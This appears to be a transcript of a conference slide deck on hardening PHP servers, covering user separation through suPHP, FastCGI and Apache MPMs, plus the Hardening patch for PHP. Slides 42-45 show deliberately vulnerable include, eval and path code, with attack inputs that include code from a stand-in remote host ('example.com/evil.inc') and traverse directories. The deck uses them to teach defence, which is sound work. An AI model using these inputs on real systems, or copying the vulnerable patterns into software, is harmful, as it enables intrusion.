Secure PHP environment
-
Upload
speedpartner-gmbh -
Category
Technology
-
view
364 -
download
1
description
Transcript of Secure PHP environment
![Page 1: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/1.jpg)
Secure PHP environment
Stefan NeufeindSpeedPartner GmbH
![Page 2: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/2.jpg)
2
About me Stefan Neufeind From Neuss (near Düsseldorf, Germany)
Working for SpeedPartner GmbH(consulting, development, administration)
PEAR-developer Loves PHP / FOSS :-)
![Page 3: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/3.jpg)
3
Agenda Basic steps, Common beliefs Server environment Separating users
CGI FastCGI MPM („inside“ Apache)
Delivering static files Hardening PHP Links
![Page 4: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/4.jpg)
4
Basic steps Physical security
Direct access to server / data possible?
Network security Connected to Internet? Firewalled? Security monitored?
![Page 5: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/5.jpg)
5
Basic steps Application security
Base system Webserver PHP Webapplications Other applications on same server
Any „unneeded“ services available?
![Page 6: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/6.jpg)
6
Basic steps Application security (continued)
Patches applied Configuration „carefully“ done Users / applications on the system Separation of rights / services
![Page 7: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/7.jpg)
7
Basic stepsYour personal „mix“ of:
Performance Resources
Security Ease of use
![Page 8: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/8.jpg)
8
Basic steps Security-lifecycle
Requirements: Identify needs / use-cases Design: Define rules Implementation: Apply rules Verification: Monitor rules
Continuing process of improvement Review critically
![Page 9: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/9.jpg)
9
Common beliefs “A standard installation is secure.”
Usually not(unless it does not expose any services etc.)
“I have only secure applications installed.” How can you be sure? Did you re-check this assumption lately?
(security warnings, patches, audits, ...)
![Page 10: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/10.jpg)
10
Common beliefs “My users know what they are doing.”
What are they doing? Do they know and follow the rules?
“None of the users would try to break anything.” Always somebody will try out something. If smallest „holes“ exist, they might be found.
![Page 11: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/11.jpg)
11
Server environment Run minimal services
Apache, MySQL, ... Expose only needed services to the net
Apache, ... Firewalling
Also host-based Rate-limiting, limit outgoing connections, ...
Restrictive file-/dir-permissions
![Page 12: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/12.jpg)
12
Server environment PHP:
Secure configuration (no register_globals, ...) Separate user-rights of scripts Use safety-checks:
In application-code Inside PHP (Hardening patch for PHP → later)
![Page 13: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/13.jpg)
13
Separating usersConcepts: PHP with safe_mode
Too restrictive for some scripts Only “fake” separation of users Does not work for other CGIs
Running one instance for each user User-switching where needed User-switching where possible
![Page 14: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/14.jpg)
14
User-switching via CGIPros: „Easy” to use Stable (Quite) secure
Cons: Slow PHP also as CGI No switching for
static content
![Page 15: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/15.jpg)
15
User-switching via CGISolutions: mod_suexec (from Apache) suPHP mod_suid
only for Apache 1.x, old mod_cgiwrap
only for Apache 1.x, officially discontinued
![Page 16: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/16.jpg)
16
User-switching via CGIsuPHP: Runs php-scripts without #! in first line Allows running php3/4/5 in parallel Special enviroment-setup for PHP Also runs normal CGIs
![Page 17: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/17.jpg)
17
User-switching via CGIsuPHP – Apache-configuration:AddHandler php5-script .php5<Directory /> AddHandler x-httpd-php .php suPHP_AddHandler x-httpd-php # optional: suPHP_UserGroup username groupname</Directory>suPHP_Engine on
![Page 18: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/18.jpg)
18
User-switching via CGIsuPHP – excerpts from /etc/suphp.conf:webserver_user=apache;Path all scripts have to be indocroot=/var/www;Check wheter script is within DOCUMENT_ROOTcheck_vhost_docroot=true;Umask to set, specify in octal notationumask=0077
![Page 19: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/19.jpg)
19
User-switching via CGIsuPHP – excerpts from /etc/suphp.conf:; Security optionsallow_file_group_writeable=falseallow_file_others_writeable=falseallow_directory_group_writeable=falseallow_directory_others_writeable=false; Minimum UID/GIDmin_uid=48min_gid=48
![Page 20: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/20.jpg)
20
User-switching via CGIsuPHP – excerpts from /etc/suphp.conf:[handlers];Handler for php-scriptsx-httpd-php=php:/usr/bin/php-cgi;Handler for CGI-scriptsx-suphp-cgi=execute:!self
![Page 21: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/21.jpg)
21
User-switching via FastCGIPros: Faster than CGI Stable Platform-
independent Runnable remote
from webserver
Cons: Fixed number of
instances per user Only for FastCGI-
enabled programs(e.g. PHP)
No switching for static content
![Page 22: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/22.jpg)
22
User-switching via FastCGI Instances of FastCGI-program running
without being closed Saves fork() etc. on every request
Communication to webserver using domain-sockets or TCP/IP instead of pipes Allows running remote from webserver
![Page 23: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/23.jpg)
23
User-switching via FastCGIApache-configuration, global:
Instead of „-socket” use “-host” forremote connections via TCP/IP
Colon in socket-name due to PHP-bug
<IfModule mod_fastcgi.c> FastCgiExternalServer /var/run/php-fastcgi/fcgi-bin/demouser/php4 -socket /var/run/php-fastcgi/sockets/demouser:php4</IfModule>
![Page 24: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/24.jpg)
24
User-switching via FastCGIApache-configuration, virtualhost/directory:
Last argument to “ScriptAlias” is identifier Identifier used for mapping internally;
(should exist in filesystem for compatibility with Apache 1.x/2.x)
AddHandler php-cgi .phpAction php-cgi /cgi-bin/php4ScriptAlias /cgi-bin/php4 /var/run/php-fastcgi/fcgi-bin/demouser/php4
![Page 25: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/25.jpg)
25
User-switching via FastCGIConfigurations via environment: PHP_FCGI_CHILDREN
number of PHP children to spawn
PHP_FCGI_MAX_REQUESTSnumber of requests served by a single php-process until it is restarted
![Page 26: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/26.jpg)
26
User-switching inside ApachePros: Faster than CGI Switches Apache-
instance completely Also static content
user-switched
Cons: Not recommended
for production No official (working)
Apache-module Module must match
Apache-version
![Page 27: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/27.jpg)
27
User-switching inside ApacheSolutions via MPM for Apache 2.x:(MPM = Multi-Processing Module)
perchild (from Apache) Official statement: “module is not functional”
“Do not use unless [...] willing to help fix it.” MetuxMPM
Chaotic development; not up2date peruser (from Telena)
![Page 28: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/28.jpg)
28
User-switching inside ApacheRoots of implementations:peruser(bit more
advanced)
MetuxMPM(not for current
Apache)
perchild(not functional)
based on
based on
![Page 29: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/29.jpg)
29
User-switching inside Apacheperuser MPM: Works for Apache 2.0.52,
newer patches under development Used in production, but recommended
„If it breaks, you get to keep both pieces :)” Problems with mod_ssl
Use proxy such as “Pound” in front Disable Keepalive to avoid problems
![Page 30: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/30.jpg)
30
User-switching inside ApacheApache-configuration, global:<IfModule peruser.c> ServerLimit 256 MaxClients 256 MinSpareProcessors 2 MaxProcessors 10 MaxRequestsPerChild 1000 # kill idle procs after XX seconds ExpireTimeout 1800 Multiplexer nobody nobody
![Page 31: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/31.jpg)
31
User-switching inside ApacheApache-configuration, global:
Use one “Processor”-directive for eachuser/group/chroot-combination needed
Processor user group /home/user # chroot dir is optional: # Processor user group</IfModule># KeepAlive *MUST* be offKeepAlive Off
![Page 32: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/32.jpg)
32
User-switching inside ApacheApache-configuration, virtualhost/directory:<IfModule peruser.c># must match a defined ProcessorServerEnvironment user group /home/user# optionalMinSpareProcessors 4MaxProcessors 20</IfModule>
![Page 33: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/33.jpg)
33
Delivering static files Separating users desired
No access to foreign files Not even for static files, not even read
Works fine with fully user-switched Apache (MPM)
But how with user-switched CGI/FastCGI?
![Page 34: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/34.jpg)
34
Delivering static files Possible solution:
Apache in all user-groups Just read-access for Apache Possiblity to prevent access for Apache
to specific files (configs, logs, PHP, ...)
Linux 2.4: 32 groups per user Linux 2.6: 65535 groups per user
![Page 35: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/35.jpg)
35
Delivering static files Files for testing
Excerpt from /etc/group:
-rw-r----- user1000 group1000 file1000.txt-rw-r----- user1001 group1001 file1001.txt-rw-r----- user1002 group1002 file1002.txt-rw------- user1002 group1002 script1002.txt
group1000:x:1000:apachegroup1001:x:1001:apachegroup1002:x:1002:apache
![Page 36: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/36.jpg)
36
Hardening PHP Former “Hardened-PHP”,
now “Hardening patch for PHP” Adds extra checks, limitations and filters Backports some security-improvements
![Page 37: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/37.jpg)
37
Hardening PHPNew checks/features for: Engine Runtime Filtering Logging
![Page 38: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/38.jpg)
38
Hardening PHPEngine features: Zend Memory Manager:
Canary and safe unlink protection Zend Linked List: Canary protection Zend HashTables:
Destructor canary protection Protection of the PHP core and extensions
against format string vulnerabilities
![Page 39: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/39.jpg)
39
Hardening PHPRuntime features: Execution depth limit Separated function whitelists and
blacklists in normal and in eval() mode Failing SQL queries within the
MySQL/MySQLi/fbsql/pgsql/sqlite extensions can be logged
Script can abort after failed SQL Query
![Page 40: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/40.jpg)
40
Hardening PHPRuntime features (continued): Multiple HTTP headers in one header()
call forbidden by default Include filename limits
Overlong filename filter URL filter (optional whitelist/blacklist) Uploaded files filter Truncated filename filter
![Page 41: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/41.jpg)
41
Hardening PHPRuntime features (continued): Superglobals protected against
extract()/import_request_vars() memory_limit cannot be raised above
configured limit realpath() replacement function
Prevents problems on some platforms(Linux, BSD, ...)
![Page 42: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/42.jpg)
42
Hardening PHPRuntime – superglobals (example):
Without superglobal-protection $_SERVER might have been overwritten.
<?php// ...extract($_GET);echo $_SERVER['DOCUMENT_ROOT'];//...?>
![Page 43: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/43.jpg)
43
Hardening PHPRuntime – path checking (example):
Choose $nr = "15.txt/../../def"Actually reading /def.txtHardened PHP would find out that
/abc/artikel_15.txt is no directory
<?php// ... $a=file_get_contents("/abc/artikel_$nr.txt");echo $a;?>
![Page 44: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/44.jpg)
44
Hardening PHPRuntime configurations (php.ini, excerpt): hphp.executor.include.whitelist / blacklist
Beginning of URL schemesto allow includes from (also php://stdin)
hphp.executor.func.whitelist / blacklist hphp.executor.eval.whitelist / blacklist
![Page 45: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/45.jpg)
45
Hardening PHPRuntime – include and eval (example):
Arbitrary (remote?) includes action=http://example.com/evil.inc action=php://input%00
Function-calls via eval
<?php include $_GET['module'].'-module.php'; eval('module_'.$_GET['module'].'_init()');?>
![Page 46: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/46.jpg)
46
Hardening PHPFiltering features: GET, POST, COOKIE variables with
following names not registered: GLOBALS, _COOKIE, _ENV, _FILES, _GET, _POST _REQUEST, _SERVER, _SESSION,
HTTP_COOKIE_VARS HTTP_ENV_VARS, HTTP_GET_VARS,
HTTP_POST_FILES, HTTP_POST_VARS, HTTP_RAW_POST_DATA, HTTP_SERVER_VARS, HTTP_SESSION_VARS
![Page 47: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/47.jpg)
47
Hardening PHPFiltering features (continued): Limits can be enforced on COOKIE, GET
or POST variables or all REQUEST vars Number of variables Maximum length of variable name Maximum length of array indices Maximum length of variable value Maximum depth of array
![Page 48: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/48.jpg)
48
Hardening PHPFiltering features (continued): Allow/disallow %00 in user-input Limit for number of uploadable files Hook for variable name checks
before file upload Uploaded ELF files can be filtered External verification script
for uploaded files
![Page 49: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/49.jpg)
49
Hardening PHPFiltering features (examples): %00 (binary null) used to terminate strings
Can prevent some functions to check beyond this artificial “end of string”
Check filenames before passed to script Allow virus-scans, rejecting certain files, ...
![Page 50: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/50.jpg)
50
Hardening PHPLogging features: Logging of ALERT classes
configurable by class Syslog facility and priority configurable ALERTS loggable by SAPI error log ALERTS loggable by external script Attackers IP addresses can be extracted
from X-Forwarded-For headers
![Page 51: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/51.jpg)
51
Hardening PHPPros: „Paranoid“ checks Can prevent
unknown exploits Additional security
without touching scripts
Cons: Security vs.
performance / resources
Some rules might be “too restrictive” initially Adjust carefully
where needed
![Page 52: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/52.jpg)
52
Links CGI-userswitching for Apache:
mod_suexechttp://httpd.apache.org/docs/2.0/mod/mod_suexec.html
suphphttp://www.suphp.org/
mod_suidhttp://www.palsenberg.com/index.php/plain/projects/
mod_cgiwraphttp://mod-cgiwrap.sourceforge.net/
![Page 53: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/53.jpg)
53
Links MPMs for Apache:
Perchild (from Apache)http://httpd.apache.org/docs/2.0/mod/perchild.html
MetuxMPM: Official: http://www.metux.de/mpm/ Unofficial: http://www.sannes.org/metuxmpm/
Peruser (from Telena)http://www.telana.com/peruser.php
![Page 54: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/54.jpg)
54
Links / Thanks FastCGI
http://www.fastcgi.com/
Hardending patch for PHPhttp://www.hardened-php.org/
PHP Professionell(German magazine, article on hardening PHP)
Thanks go to: Hilko Bengen (FastCGI) Stefan Esser (Hardened PHP)
![Page 55: Secure PHP environment](https://reader033.fdocuments.in/reader033/viewer/2022052900/555a69b9d8b42ae7218b4d5c/html5/thumbnails/55.jpg)
55
Thank you!
Up-to-date slides available at:http://talks.speedpartner.de/
Questions?neufeind (at) speedpartner.de